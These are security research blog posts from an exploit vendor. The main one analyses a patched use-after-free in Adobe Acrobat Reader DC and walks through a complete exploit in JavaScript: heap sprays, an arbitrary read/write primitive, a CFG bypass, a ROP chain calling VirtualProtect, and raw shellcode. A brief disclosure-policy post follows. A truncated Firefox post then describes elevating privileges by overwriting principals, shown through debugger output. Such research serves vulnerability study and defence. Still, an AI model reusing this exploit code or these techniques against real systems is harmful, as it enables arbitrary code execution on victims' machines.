When a data ESObject is deleted from the cache, the name used in the cache_key is always encoded in Unicode. This leads to a condition where cache entries for data ESObject with ANSI names are never purged from cache; instead the cache entries retain pointers to freed data ESObjects indefinitely.

If an ANSI data ESObject is thus freed, and the code tries to create a new data ESObject with a matching name (e.g., when JavaScript code deletes this.dataObjects[0] and then accesses this.dataObjects[0]), a cache hit occurs but the pointer returned is the pointer to the ANSI-named data ESObject that was previously freed. This leads to an exploitable use-after-free condition.

Code Analysis

Lets take a look at how these objects are represented under the hood, and examine where the bug exists. Code listings show decompiled C code; source code is not available in the affected product. Structure definitions, function names, etc. are obtained by reverse engineering and may not accurately reflect those defined in the source code.

Structure Definitions

The cache mechanism is implemented with the use of a variant of Binary Search Trees. A pointer to the cache is kept in a global variable at EScript+0x273AAC, which points to a structure (named here as esobject_cache_st) defined as follows:

typedef struct esobject_cache_st {
  bst_node *root_node;
  int      *node_count;
  void     *unkonw;
} esobject_cache;

typedef struct bst_node_st {
  bst_node  *left;
  bst_node  *parent;
  bst_node  *right;
  int       node_type;
  cache_key *key;
  void      *esobject;
} bst_node;

A pointer to the cache_key structure is stored within each node in the cache. The cache_key structure is defined as follows:

typedef struct cache_key_st {
  void *pddoc;
  ESString *name;
} cache_key;

The cache_key structure contains the name of the embedded file in the form of an ESString structure, which is defined as follows:

typedef struct esstring_st {
  int  type;
  char *buffer;
  int  len;
  int  max_capacity;
  void *unknown1;
  void *unknown2;
} ESString;

In the structure above, the buffer member is a pointer to the string encoded in the format specified in the type member (1 for ANSI, 2 for Unicode). Its length is defined by the len member and the maximum capacity of the buffer is indicated by max_capacity. In Unicode ESString objects the buffer encoding is UTF-16 with Byte Order Mark (BOM).

Comparing Cache Keys

Any operation that requires traversing the tree require a key comparison function. This function is implemented at EScript+0x90770 and its code is listed below.

bool is_key_greater(cache_key *key1, cache_key *key2)
{
  ESString *data_object_name_from_cache;
  ESString *data_object_name;

[1]

  if ( a1->pddoc != key->pddoc )
    return a1->pddoc < (unsigned int)key->pddoc;
  name2 = key2->name;
  name1 = key1->name;
  return esstrings_compare(&name1, &name2);
}

The function first checks whether the keys belong to the same PDF document [1]. If they belong to the same PDF document then it proceeds to compare the names of the keys, which are ESString objects.

The ESString comparison function (implemented at EScript+0x45B07) is listed below.

bool esstrings_compare(ESString **name1, ESString **name2)
{
  ESString *type1;
  ESString *type2;
  bool v4;

  type1 = get_ESString_type(*name1);
  type2 = get_ESString_type(*name2);

[2]

  if ( type1 == type2 )
    v4 = (sub_23845B5E(*name1, *name2) & 0x8000u) != 0;
  else
    v4 = (int)type1 < (int)type2;
  return v4;
}

Relevant to this vulnerability is that at [2] there is a check that compares the ESString types. If they differ, the result of the function is true if type1 is less than type2. For example, when comparing two keys with the same name of different types where type1 is ANSI (1) and type2 is Unicode (2), the esstrings_compare function returns true.

When performing a lookup in the data ESObject cache, the function that implements it (EScript+0x90476) considers keys with the same name but different ESString types as different.

Deleting Cache Entries

When a data ESObject is freed, the corresponding cache entry that stores a pointer to the object is also freed. The ESObject deletion is implemented in the function at EScript+0x907B0, which is listed below.

__int16 delete_object(int a1)
{
  int v1;
  ESString *v2;
  wchar_t *v3;
  wchar_t *v4;
  esobject_cache_struct *cache_ptr;
  cache_key key;
  int v8[3];
  int v9;

  v1 = sub_23858B70(a1);

[1]

  v2 = (ESString *)sub_23844B00(a1, "DataObject");
  v3 = (wchar_t *)v2;
  if ( v1 )
  {
    if ( !v2 )
      return 1;
    v4 = (wchar_t *)get_dataobject_name(v2);
    v8[0] = (int)v4;
    v9 = 0;
    key.doc = v1;
    sub_23877D42(&key.name, (ESString **)v8);
    LOBYTE(v9) = 1;
    cache_ptr = initialize_data_esobject_cache(global_cache_ptr);

[2]

    remove_key_from_cache(cache_ptr, &key);
    LOBYTE(v9) = 2;
    if ( key.name )
      sub_23845AAE((wchar_t *)key.name);
    v9 = 3;
    if ( v4 )
      sub_23845AAE(v4);
    v9 = -1;
  }
  if ( v3 )
    sub_23845AAE(v3);
  return 1;
}

The call at [1] returns a pointer to an ESString object used to create the cache_key object. This is passed to the function that removes cache nodes matching the cache_key object at [2].

The vulnerability occurs because [1] returns a pointer to an ESString object whose type is always Unicode (ESString.type = 2). However, the ESString value of the keys stored in the cache nodes keeps the type that was used in the definition of the data object in the PDF file. If that name was defined as an ANSI string in the PDF file, the cache key would also be ANSI (ESString.type = 1).

Any lookup for a cache entry whose name was defined with an ANSI ESString is never found, since the created cache key used for the lookup is always a Unicode ESString. This prevents the cache node from being removed, leaving a stale pointer to the corresponding ESObject that is freed.

Accessing Deleted Objects

When the data ESObject cache contains entries that were not removed due to the ESString type mismatch problem, any attempt to access the freed object from JavaScript retrieves the stale pointer corresponding to that entry. Therefore, any operation on that pointer causes an access to memory that was already freed, triggering the use-after-free.

The function listed below handles accesses to data ESObjects and is implemented at EScript+0x929F0.

__int16 accessDataObjects(int a1, int a2, int a3)
{
  wchar_t *v3;
  int v5;
  int v6;
  int v7;
  ESString *v8;
  int v9;
  bool v10;
  wchar_t *v11;
  int v12;
  int freed_object_retrieved;
  int v14;
  int v15[3];
  wchar_t *v16;
  wchar_t *v17;
  wchar_t *v18;
  int v19;
  int v20;

  v3 = (wchar_t *)sub_23858B70(a1);
  v16 = v3;
  if ( !v3 )
    return sub_238AB500(a1, a2, 0, 14, 0);
  v17 = (wchar_t *)sub_238401C0((int *)a1);
  v5 = sub_2387DC8A(v3, v14);
  v6 = v5;
  v7 = 0;
  if ( v5 )
    v18 = (wchar_t *)custom_calloc(v5, 4);
  else
    v18 = 0;
  v8 = new_esstring(0, 1);
  v15[2] = (int)v8;
  v20 = 0;
  v9 = 0;
  v19 = 0;
  v10 = v6 == 0;
  if ( v6 > 0 )
  {
    v11 = v18;
    _mm_lfence();
    do
    {
      sub_2387DB6D(v16, v9, (int)v8);
      v12 = sub_2383D040(v17, 1);
      *(_DWORD *)&v11[2 * v19] = v12;
      v15[0] = (int)v16;

[1]

      v15[1] = get_ESString_buffer(v8);

[2]

      freed_object_retrieved = sub_23882310(v17, "Data", (wchar_t *)v15);

[3]

      sub_2383D430(*(int **)&v11[2 * v19], freed_object_retrieved);
      v9 = v19 + 1;
      v19 = v9;
    }
    while ( v9 < v6 );
    v7 = 0;
    v10 = v6 == 0;
  }
  if ( !v10 )
    v7 = sub_2385CE40(v17, v18, v6, 1);
  sub_2383D430((int *)a3, v7);
  if ( v6 )
    (*(void (__cdecl **)(wchar_t *))(dword_23A7538C + 12))(v18);
  v20 = 1;
  if ( v8 )
    sub_23845AAE((wchar_t *)v8);
  return 1;
}

The call at [1] triggers the creation of data ESObjects based on the data object name retrieved at [2]. This causes a cache lookup that returns the ESObject pointer of the corresponding cache entry that is then used in the call at [3].

Exploitation

We’ll now walk through how this vulnerability can be exploited to achieve arbitrary code execution. The following exploit is designed for Adobe Acrobat Reader DC version 2020.009.20063 running on Windows 10 x64.

A successful exploit strategy needs to bypass the following security mitigations on the target:

  • Address Space Layout Randomization (ASLR)
  • Data Execution Prevention (DEP)
  • Control Flow Guard (CFG)

In order to bypass all three mitigations, the following exploitation strategy is adopted:

  1. Spray a large number of ArrayBuffer objects with the correct size so they are adjacent to each other. The sprayed ArrayBuffer objects must contain a crafted fake Array object that is used to corrupt the adjacent ArrayBuffer.byteLength field (step 6).
  2. Prime the Low Fragmentation Heap (LFH) for size 0x48 (the size of the freed ESObject).
  3. Create and free the target ESObject.
  4. Spray crafted strings to allocate memory in the address used by the freed ESObject. The crafted string must contain a pointer to a predictable address where one of the fake Array objects created in step 1 would be.
  5. Trigger the ESObject reuse to obtain a handle to the fake Array in the exploit JavaScript code.
  6. Use the fake Array handle obtained in step 5 to write past the underlying ArrayBuffer boundaries and overwrite the byteLength field of the adjacent ArrayBuffer with the value 0xffffffff. This, combined with the creation of a DataView object on the corrupted ArrayBuffer allows reading from and writing to arbitrary memory addresses.
  7. Use the arbitrary read and write to write the ROP chain and shellcode.
  8. Overwrite a function pointer of the fake Array object and trigger its call to hijack the execution flow.

The following sub-sections break down the exploit code with explanations for better understanding.

Spraying ArrayBuffer Objects

When dealing with the heap, the addresses of allocations are not consistent between executions and thus can not be hardcoded into the exploit. In order to be able to place controlled memory regions in predictable addresses the internals of the memory manager have to be leveraged.

The heap spray technique performs a large number of controlled allocations with the intention of having adjacent regions of controllable memory. The key to obtaining adjacent memory regions is to make the allocations of a specific size.

In JavaScript, a convenient way of making allocations in the heap whose content is completely controlled is by using ArrayBuffer objects. The memory allocated with these objects can be read from and written to with the use of DataView objects.

In order to get a heap allocation of the right size the metadata of ArrayBuffer objects and heap chunks have to be taken into consideration. The internal representation of ArrayBuffer objects tells that the size of the metadata is 0x10 bytes. The size of the metadata of a busy heap chunk is 8 bytes.

Since the objective is to have adjacent memory regions filled with controlled data, the allocations performed must have the exact same size as the heap segment size, which is 0x10000 bytes. Therefore, the ArrayBuffer objects created during the heap spray must be of 0xffe8 bytes.

var SHIFT_ALIGNMENT = 4;
var FAKE_ARRAY_JSOBJ_ADDR = 0x40000058 + SHIFT_ALIGNMENT;
var HEAP_SEGMENT_SIZE = 0x10000
var ARRAY_BUFFER_SZ = HEAP_SEGMENT_SIZE-0x10-0x8

[1]

var arrayBufferSpray = new Array(0x8000);

function sprayArrayBuffers() {

    // Spray a large number of ArrayBuffers containing crafted data (a fake array)
    // so we end up with a fake JS array object at FAKE_ARRAY_JSOBJ_ADDR

    for (var i = 0; i < arrayBufferSpray.length; i++) {
        arrayBufferSpray[i] = new ArrayBuffer(ARRAY_BUFFER_SZ);
        var dv = new DataView(arrayBufferSpray[i]);


[2]

        // ArrayObject.shape_
        dv.setUint32(SHIFT_ALIGNMENT+0, FAKE_ARRAY_JSOBJ_ADDR+0x10, true);

        // ArrayObject.type_
        dv.setUint32(SHIFT_ALIGNMENT+4, FAKE_ARRAY_JSOBJ_ADDR+0x40, true);

        // ArrayObject.elements_
        dv.setUint32(SHIFT_ALIGNMENT+0xc, FAKE_ARRAY_JSOBJ_ADDR+0x80, true);

        // ArrayObject.shape_.base_
        dv.setUint32(SHIFT_ALIGNMENT+0x10, FAKE_ARRAY_JSOBJ_ADDR+0x20, true);

        // ArrayObject.shape_.base_.flags
        dv.setUint32(SHIFT_ALIGNMENT+0x20+0x10, 0x1000, true);

        // ArrayObject.type_.classp
        dv.setUint32(SHIFT_ALIGNMENT+0x40, FAKE_ARRAY_JSOBJ_ADDR+0x40+0x10, true);

        // ArrayObject.type_.classp.enumerate
        dv.setUint32(SHIFT_ALIGNMENT+0x40+0x10+0x1c, 0xdead1337, true);

        // ArrayObject.elements_.flags
        dv.setUint32(SHIFT_ALIGNMENT+0x80-0x10, 0, true);

        // ArrayObject.elements_.initializedLength
        dv.setUint32(SHIFT_ALIGNMENT+0x80-0x10+4, 0xffff, true);

        // ArrayObject.elements_.capacity
        dv.setUint32(SHIFT_ALIGNMENT+0x80-0x10+8, 0xffff, true);

        // ArrayObject.elements_.length
        dv.setUint32(SHIFT_ALIGNMENT+0x80-0x10+0xc, 0xffff, true);
    }
}

The exploit function listed above performs the ArrayBuffer spray. The total size of the spray defined in [1] was determined by setting a number high enough so an ArrayBuffer would be allocated at the selected predictable address defined by the FAKE_ARRAY_OBJ_ADDR global variable.

Each of the sprayed ArrayBuffer objects contain a crafted fake Array object [2]. To craft a fake Array objects not all the internal structures need to be provided. However, there are some important values that need to be chosen carefully:

  • Elements.initializedLength: The number of elements that have been initialized.
  • Elements.capacity: The number of allocated slots.
  • Elements.length: The length property of Array objects.

When the use-after-free condition is triggered, operations on the crafted Array object (set as values of the sprayed the ArrayBuffer object) include reading and writing to the Array. The eventual goal is to corrupt the byteLength field of an ArrayBuffer object (which is a well-known method to obtain a read and write primitive). By ensuring that the crafted Array object allows writing past the boundaries of the underlying ArrayBuffer object and into an adjacent ArrayBuffer, the adjacent ArrayBuffer can be desirably corrupted. Therefore, the values of the Array object properties need to be bigger than number of bytes that separate the start of the array from the next ArrayBuffer metadata.

Priming the Low Fragmentation Heap

The size of the object that is freed in this vulnerability is of 0x48 bytes (the size of an ESObject). Allocations with this size are likely to end up being handled by the Low Fragmentation Heap (LFH) if enough consecutive allocations of that size are performed.

In order to be able to allocate into the addresses of the freed ESObject, it is good to make sure that the object is handled by the LFH in order to reduce the possibility of the application uncontrollably allocating into that spot.

var lfhPrime = new Array(0x1000);

function primeLFH() {

    // Activate the LFH bucket for size 0x48 (real chunk size is 0x50) and help improve determinism.
    // We want the allocation of the UAFed object to fall in the LFH so we can claim its freed chunk more or less reliably.

[1]

    var baseString = "Prime the LFH!".repeat(100);
    for (var i = 0; i < lfhPrime.length; i++) {
        lfhPrime[i] = baseString.substring(0, 0x48 / 2 - 1).toUpperCase();
    }

[2]

    for (var i = 0; i < lfhPrime.length; i+=2) {
        lfhPrime[i] = null;
    }
}

The function listed above performs multiple allocations of size 0x48 [1] in order to activate the LFH bucket for that size. Activating the LFH for a specific size requires at least 0x11 consecutive allocations. However, since the application might require allocations of that specific size for other uses, some of the allocations are freed to reduce the possibility of it allocating into the freed ESObject spot [2].

Creating and Freeing the Vulnerable Object

Once the memory is laid out the ESObject has to be created, added into the cache, and then freed.

[1]

this.dataObjects[0].toString();

[2]

this.dataObjects[0] = null;

[3]

g_timeout = app.setTimeOut("triggerUAF()", 1000);

In the code listing above, [1] triggers the creation of the data ESObject that is stored in the object cache. Then, [2] removes the reference to it so when the Garbage Collector is triggered in [3] the ESObject is freed.

Allocating Into the Freed Spot

At this point the heap has been curated for allocation into the freed ESObject spot. To do so, a large number of allocations of size 0x48 have to be performed in order to have a chance of one landing into that spot.

[1]

var stringSpray = new Array(0x2000);

function sprayStrings() {
    // Spray strings of size 0x48/2-1 in order to eventually allocate into the spot left by the freed chunk
    var baseString = unescape(toUnescape(FAKE_ARRAY_JSOBJ_ADDR).repeat(0x48));
    for (var i = 0; i < stringSpray.length; i++) {
        stringSpray[i] = baseString.substring(0, 0x48 / 2 - 1).toLowerCase();
    }
}

The allocations are performed with a spray of the size defined at [1]. The value for this size is the double of the size selected for priming the LFH to make sure to fill the free spots left and also the ESObject spot.

The object used in the spray is a string, as it allows an easy control of the size and contents without any metadata overhead. The contents of the string is the unescaped value of the address where a fake Array object is expected to have been allocated during the initial ArrayBuffer spray. The unescape function is used to deal with Unicode transformation.

Achieving Arbitrary Read and Write

Once the predictable address occupies the spot in memory left by the freed ESObject and points to the fake Array object, an access to the data object provides a handle to that fake Array object that can be used as a normal Array. This can be achieved with the following line of code:

var fakeArrObj = this.dataObjects[0]

By carefully choosing the element of the fake Array to assign a value to, the adjacent ArrayBuffer can be corrupted. The interesting value to corrupt is the byteLength property. Following the byteLength field, the next value in memory is a pointer to the DataView object associated to the ArrayBuffer. It is important to take into account that this value can only be either a valid pointer or zero.

function getArbitraryRW(fakeArrObj) {
    var corruptedArrayBuffer = null;

[1]

    var nextABByteLengthOffset = ARRAY_BUFFER_SZ-0x10-0x70+0x8;
    fakeArrObj[nextABByteLengthOffset / 8] = 2.12199579047120666927013567069E-314;

[2]

    fakeArrObj[0] = this.addField("t", "text", 0, [0, 0, 0, 0 ]);
    fakeArrObj[0].value = "dummy1337w00t";

[3]

    for (var i = 0; i < arrayBufferSpray.length; i++) {
        if (arrayBufferSpray[i].byteLength == -1) {
            corruptedArrayBuffer = arrayBufferSpray[i];
        }
    }

[4]

    return new DataView(corruptedArrayBuffer);
}

In the code listing above, the byteLength value of the adjacent ArrayBuffer object is overwritten [1]. The integer value used translates to 0xFFFFFFFF 0x00000000 in memory due to the IEEE 754 representation for double values.

Aside from the ArrayBuffer corruption, a text field is created and assigned to the fake Array [2]. This is later used to leak a pointer to the AcroForm.api module, which is used to leak the icucnv58.dll module base address.

The next step is to locate the corrupted ArrayBuffer by checking the size of all the allocated buffers [3]. Finally, creating a DataView on the corrupted ArrayBuffer allows to read from and write to arbitrary memory addresses, since the size of the ArrayBuffer was set to 0xffffffff. However, the addresses specified when reading or writing memory are relative to the address where the corrupted ArrayBuffer is located. For convenience, the following helper functions were created to read and write memory using absolute addresses.

function readUint32(dataView, absoluteAddress) {
    var startAddr = FAKE_ARRAY_JSOBJ_ADDR-SHIFT_ALIGNMENT+HEAP_SEGMENT_SIZE;
    var addrOffset = absoluteAddress - startAddr;
    if (addrOffset < 0) {
        addrOffset = addrOffset + 0xffffffff + 1;
    }
    return dataView.getUint32(addrOffset, true);
}

function writeUint32(dataView, absoluteAddress, data) {
    var startAddr = FAKE_ARRAY_JSOBJ_ADDR-SHIFT_ALIGNMENT+HEAP_SEGMENT_SIZE;
    var addrOffset = absoluteAddress - startAddr;
    if (addrOffset < 0) {
        addrOffset = addrOffset + 0xffffffff + 1;
    }
    dataView.setUint32(addrOffset, data, true);
}

Writing and Executing the ROP Chain

The security mitigations present in the application determine the strategy and techniques required. ASLR and DEP force using Return Oriented Programming (ROP) combined with leaked pointers to the relevant modules. CFG forbids redirecting the execution flow via pointer overwrite to arbitrary addresses.

One way of bypassing the CFG restrictions is to redirect the execution flow to a module that was not built with CFG enabled. Adobe Acrobat Reader DC ships with some modules that do not have CFG enabled. The most convenient one for the current exploit is icucnv58.dll. Its large size (plenty of options for ROP gadgets) and the fact that it gets loaded at runtime if text fields are used (this module offers functions to handle Unicode data) makes it a perfect candidate.

Taking this into account, the strategy can be the following:

  1. Obtain pointers to the relevant modules to calculate their base addresses.
  2. Pivot the stack to a memory region under our control where the addresses of the ROP gadgets can be written.
  3. Write the shellcode.
  4. Call VirtualProtect to change the shellcode memory region permissions to allow execution.
  5. Overwrite a function pointer that can be called later from JavaScript.

The following code implements the mentioned strategy:

function writePayload(dv) {

[1]

    var escriptAddrDelta = 0x275528;
    var fakeArrObjElementsPtr = readUint32(dv, FAKE_ARRAY_JSOBJ_ADDR+0xC);
    var escriptBaseAddr = readUint32(dv, readUint32(dv, fakeArrObjElementsPtr)+0xc) - escriptAddrDelta;

[2]

    var acroFormAddrDelta = 0x2827d0;
    var acroFormBaseAddr = readUint32(dv, readUint32(dv, readUint32(dv, fakeArrObjElementsPtr)+0x10)+0x34) - acroFormAddrDelta;

[3]

    var icucnv58AddrDelta = 0xc3ad8c;
    var icucnv58BaseAddr = readUint32(dv, readUint32(dv, acroFormBaseAddr+icucnv58AddrDelta)+0x10);

[4]

    var kernel32BaseAddr = readUint32(dv, escriptBaseAddr+0x273ED0);

[5]

    // Stack pivot
    //    0x95907: mov esp, 0x59000008; ret;
    var stackPivot = icucnv58BaseAddr+0x95907;

[6]

    var virtualProtectStubDelta = 0x20420;
    writeUint32(dv, 0x59000008, kernel32BaseAddr+virtualProtectStubDelta);

[7]

    // VirtualProtect parameters
    writeUint32(dv, 0x59000008+4, SHELLCODE_ADDR);
    writeUint32(dv, 0x59000008+8, SHELLCODE_ADDR);
    writeUint32(dv, 0x59000008+12, SHELLCODE_BUFFER_SZ);
    writeUint32(dv, 0x59000008+16, 0x40);
    writeUint32(dv, 0x59000008+20, fakeArrObjElementsPtr+0x8);

    // Write the shellcode
    shellcode = [0x0082e8fc, 0x89600000, 0x64c031e5, 0x8b30508b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0x3cacff31,
    0x2c027c61, 0x0dcfc120, 0xf2e2c701, 0x528b5752, 0x3c4a8b10, 0x78114c8b, 0xd10148e3, 0x20598b51,
    0x498bd301, 0x493ae318, 0x018b348b, 0xacff31d6, 0x010dcfc1, 0x75e038c7, 0xf87d03f6, 0x75247d3b,
    0x588b58e4, 0x66d30124, 0x8b4b0c8b, 0xd3011c58, 0x018b048b, 0x244489d0, 0x615b5b24, 0xff515a59,
    0x5a5f5fe0, 0x8deb128b, 0x8d016a5d, 0x0000b285, 0x31685000, 0xff876f8b, 0xb5f0bbd5, 0xa66856a2,
    0xff9dbd95, 0x7c063cd5, 0xe0fb800a, 0x47bb0575, 0x6a6f7213, 0xd5ff5300, 0x636c6163, 0x00000000]

[8]

    for (var i = 0; i < shellcode.length; i++) {
        writeUint32(dv, SHELLCODE_ADDR+i*4, shellcode[i]);
    }

[9]

    // Overwrite the fake array ArrayObject.type_.classp.enumerate pointer to achieve EIP control
    writeUint32(dv, FAKE_ARRAY_JSOBJ_ADDR+0x40+0x10+0x1c, stackPivot);
}

In the code listing above, at [1], [2], [3], and [4] the base addresses of the EScript.api, AcroForm.api, icucnv58.dll, and Kernel32.dll modules are obtained. At [5] the address to the stack pivot gadget is calculated. The function pointer selected to hijack the execution flow does not allow controlling any other CPU register, so the stack pivot gadget selected (mov esp, 0x59000008; ret) relocates the stack to 0x59000008, where the address of the VirtualProtect function [6] and the parameters passed to it are written [7]. Finally, the shellcode is written [8] and the fake Array object internal pointer ArrayObject.type_.classp.enumerate is overwritten with the address of the stack pivot gadget [9].

The last step is to trigger the execution of the ROP chain by assigning a value to an nonexistent property of the fake Array object. This would call the internal enumerate function as it should define all the lazy properties not yet reflected in the object. This can be done with the following line of code:

fakeArrObj.triggerRopchain = 2;

Conclusion

Adobe patched this vulnerability in August 2020. However it is likely that more vulnerabilities of this nature will continue to pop up in Adobe Reader given its large attack surface. We hope you enjoyed reading our analysis and learned something new. Be sure to checkout our other blog posts such as Firefox vulnerability research and patch-gapping Chrome.

The post Analysis of a use-after-free Vulnerability in Adobe Acrobat Reader DC appeared first on Exodus Intelligence.

2021 Disclosure Policy

17 March 2021 at 16:16

It’s been a half-decade since we last updated our disclosure policy and it’s time for us to iterate on our policy again. As we detailed in our previous post, while there is inherent value to our subscription customers to maximize our 0-day shelf life… empirically, we can state that such vulnerabilities can go unpatched for inordinately long times and it is in the best interest of the community at large to keep vendors informed. As of the time of this writing, we have adopted the following simple disclosure policy.

  1. Vulnerability information will be reported to the affected vendor six months after release to our subscribers.
  2. Six months after this disclosure, or once the vendor has released a patch, whichever happens first; we reserve the right to publish details about the vulnerability.

This policy applies to both internally generated research as well as any research acquired through our Research Sponsorship Program (RSP), an effort we maintain to crowdsource both 0-day and n-day research from individual contributors around the globe.

If you’re interested in learning more about our subscriptions, we welcome you to reach out to us at [email protected].

The post 2021 Disclosure Policy appeared first on Exodus Intelligence.

Firefox Vulnerability Research Part 2

10 November 2020 at 17:59

By Arthur Gerkis and David Barksdale

This series of posts makes public some old Firefox research which our Zero-Day customers had access to before it was known publicly, and then our N-Day customers after it was patched. We’ve also used this research to teach browser exploitation in our Vuln-Dev Master Class.

In the previous post we analyzed an integer underflow in part of Firefox’s WebAssembly code and used it to read and write memory in the sandboxed content process. In this post we will use this to execute arbitrary code in the content process, and finally escape the sandbox to the broker process and execute calc.exe.

Executing Privileged JavaScript

Here we will discuss a technique for executing privileged JavaScript by making use of the ability to read and write memory. An overview of the script security architecture of Firefox can be found here. There is a JavaScript object specific only to Firefox-based browsers called Components. Normal content pages run with the content principal and have a limited version of this object. Pages with the system principal have full access to the object and can use it to access native XPCOM objects. The goal is to gain access to a privileged Components object using the following steps:

  1. find and leak the address of the system principal;
  2. find and override the actual document compartment principal with the system principal; this gives the ability to access properties of privileged objects;
  3. find and override an iframe principal with the system principal; this allows us to load privileged pages into an actual iframe;
  4. load a privileged page into an iframe and access its Components.

Finding the System Principal

We first find the base address of xul.dll using an address of a TypedArray object we discovered previously. At offset 0xC into this object is a pointer into the xul.dll module. All modules are loaded on a 0x10000 byte boundary and contain the Portable Executable signature ‘MZ’ as the first 16-bit word. We simply start searching backwards in memory from our pointer into xul.dll on said boundary for the signature.

Once we’ve found xul.dll in memory we can parse its export tables to look for various symbols within the module. The first symbol we look for is nsLayoutModule_NSModule. This is a structure which contains a useful pointer, it is shown below.

0:033> ln xul + 0x1e25620
(55265620)   xul!nsLayoutModule_NSModule   |  (55265624)   xul!docshell_provider_NSModule
Exact matches:
    xul!nsLayoutModule_NSModule = 0x557f3b58

0:033> dt xul!nsLayoutModule_NSModule
0x557f3b58 
   +0x000 mVersion         : 0x34
   +0x004 mCIDs            : 0x557f3270 mozilla::Module::CIDEntry
   +0x008 mContractIDs     : 0x557f2650 mozilla::Module::ContractIDEntry
   +0x00c mCategoryEntries : 0x557f3008 mozilla::Module::CategoryEntry
   +0x010 getFactoryProc   : (null) 
   +0x014 loadProc         : 0x539ef4f9     nsresult  xul!Initialize+0
   +0x018 unloadProc       : 0x5358734f     void  xul!LayoutModuleDtor+0
   +0x01c selector         : 4 ( ALLOW_IN_GPU_PROCESS )

We follow the loadProc pointer to the function Initialize, which is shown below.

xul!Initialize [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\layout\build\nslayoutmodule.cpp @ 353]:
539ef4f9 803d94179d5500  cmp     byte ptr [xul!gInitialized (559d1794)],0
539ef500 0f85bdc73500    jne     xul!Initialize+0x35c7ca (53d4bcc3)
539ef506 833dc01e9f5505  cmp     dword ptr [xul!mozilla::startup::sChildProcessType (559f1ec0)],5
539ef50d 7420            je      xul!Initialize+0x36 (539ef52f)
539ef50f 56              push    esi
539ef510 c60594179d5501  mov     byte ptr [xul!gInitialized (559d1794)],1
539ef517 e80613f6ff      call    xul!nsXPConnect::InitStatics (53950822)
539ef51c e811000000      call    xul!nsLayoutStatics::Initialize (539ef532)

We disassemble this function and follow the call to nsXPConnect::InitStatics, which is shown below.

xul!operator new [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\js\xpconnect\src\nsxpconnect.cpp @ 109] 
[inlined in xul!nsXPConnect::InitStatics [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\js\xpconnect\src\nsxpconnect.cpp @ 109]]:
53950822 6a10            push    10h
53950824 ff15cc432655    call    dword ptr [xul!_imp__moz_xmalloc (552643cc)]
5395082a 59              pop     ecx
5395082b 85c0            test    eax,eax
5395082d 0f84d8b43c00    je      xul!nsXPConnect::InitStatics+0x3cb4e9 (53d1bd0b)
53950833 8bc8            mov     ecx,eax
53950835 e824180000      call    xul!nsXPConnect::nsXPConnect (5395205e)
5395083a 83780800        cmp     dword ptr [eax+8],0
5395083e 56              push    esi
5395083f a33cd79c55      mov     dword ptr [xul!nsXPConnect::gSelf (559cd73c)],eax
53950844 be18dd4055      mov     esi,offset xul!`string' (5540dd18)
53950849 0f84c3b43c00    je      xul!nsXPConnect::InitStatics+0x3cb4f0 (53d1bd12)
5395084f 50              push    eax
53950850 e87531b5ff      call    xul!mozilla::widget::myDownloadObserver::AddRef (534a39ca)
53950855 e8b26af0ff      call    xul!nsScriptSecurityManager::InitStatics (5385730c)
5395085a a1645c9d55      mov     eax,dword ptr [xul!gScriptSecMan (559d5c64)]
5395085f 6810d79c55      push    offset xul!nsXPConnect::gSystemPrincipal (559cd710)
53950864 50              push    eax
53950865 a340d79c55      mov     dword ptr [xul!nsXPConnect::gScriptSecurityManager (559cd740)],eax
5395086a 8b08            mov     ecx,dword ptr [eax]
5395086c ff5124          call    dword ptr [ecx+24h]
5395086f 833d10d79c5500  cmp     dword ptr [xul!nsXPConnect::gSystemPrincipal (559cd710)],0

We disassemble this function and find the address of nsXPConnect::gSystemPrincipal, the keys to Dad’s car.

Finding and Overriding the Document Compartment Principal

The compartment principal we want to override can be found using an iframe we previously sprayed onto the heap. To find the location of the principal we start with the JSObject containing the iframe and follow the path of pointers until we find the relevant JSCompartment object, as shown below.

0:033> ddp 067bbc40 L14/4
067bbc40  0df34a48 5596b084 xul!mozilla::dom::HTMLIFrameElementBinding::sClass
067bbc44  0df48bf8 0df352c8
067bbc48  00000000
067bbc4c  552701c8 55529c74 xul!js_Object_str
067bbc50  0dde6780 5535b7b0 xul!mozilla::dom::HTMLIFrameElement::`vftable'

0:033> dt 0dde6780 xul!mozilla::dom::HTMLIFrameElement
   +0x000 __VFN_table : 0x5535b7b0 
   +0x004 __VFN_table : 0x55271f84 
   +0x008 mWrapper         : 0x067bbc40 JSObject
   +0x00c mFlags           : 0x100004
   +0x010 mNodeInfo        : RefPtr<mozilla::dom::NodeInfo>
   +0x014 mParent          : 0x11872ce0 nsINode
   +0x018 mBoolFlags       : 0x2000e
[skip]

0:033> dd 0x067bbc40 L1
067bbc40  0df34a48

0:033> dt 0df34a48 js::ObjectGroup
xul!js::ObjectGroup
   +0x000 clasp_           : 0x5596b084 js::Class
   +0x004 proto_           : js::GCPtr<js::TaggedProto>
   +0x008 compartment_     : 0x1183ac00 JSCompartment
   +0x00c flags_           : 0
   +0x010 addendum_        : (null) 
   +0x014 propertySet      : (null) 

0:033> dt 0x1183ac00 JSCompartment
xul!JSCompartment
   +0x000 creationOptions_ : JS::CompartmentCreationOptions
   +0x014 behaviors_       : JS::CompartmentBehaviors
   +0x024 zone_            : 0x06b46800 JS::Zone
   +0x028 runtime_         : 0x04b86108 JSRuntime
   +0x02c principals_      : 0x04b8e444 JSPrincipals
   +0x030 isSystem_        : 0
[skip]

We write the value of the previously found system principal to offset 0x2C into this JSCompartment object.

Finding and Overriding the mOwnerManager Principal

Loading a privileged page into our iframe requires overriding the mOwnerManager principal of the iframe. This is found via similar path of pointers starting from the HTMLIFrameElement object found above.

0:033> dt 0dde6780 xul!mozilla::dom::HTMLIFrameElement
   +0x000 __VFN_table : 0x5535b7b0 
   +0x004 __VFN_table : 0x55271f84 
   +0x008 mWrapper         : 0x067bbc40 JSObject
   +0x00c mFlags           : 0x100004
   +0x010 mNodeInfo        : RefPtr<mozilla::dom::NodeInfo>
   +0x014 mParent          : 0x11872ce0 nsINode
   +0x018 mBoolFlags       : 0x2000e
[skip]

0:033> dd 0dde6780 
0dde6780  5535b7b0 55271f84 067bbc40 00100004
0dde6790  118c5100 11872ce0 0002000e 00000000
0dde67a0  06cd59c0 00000000 118fc800 0cb0f940
0dde67b0  00000014 04bd2f00 00020000 00000400
0dde67c0  5535b5bc e5e5e5e5 5535b59c 5535b590
0dde67d0  00000000 559e3364 5535b558 0cb0f820
0dde67e0  00000000 00000000 e5e5e500 e5e5e5e5
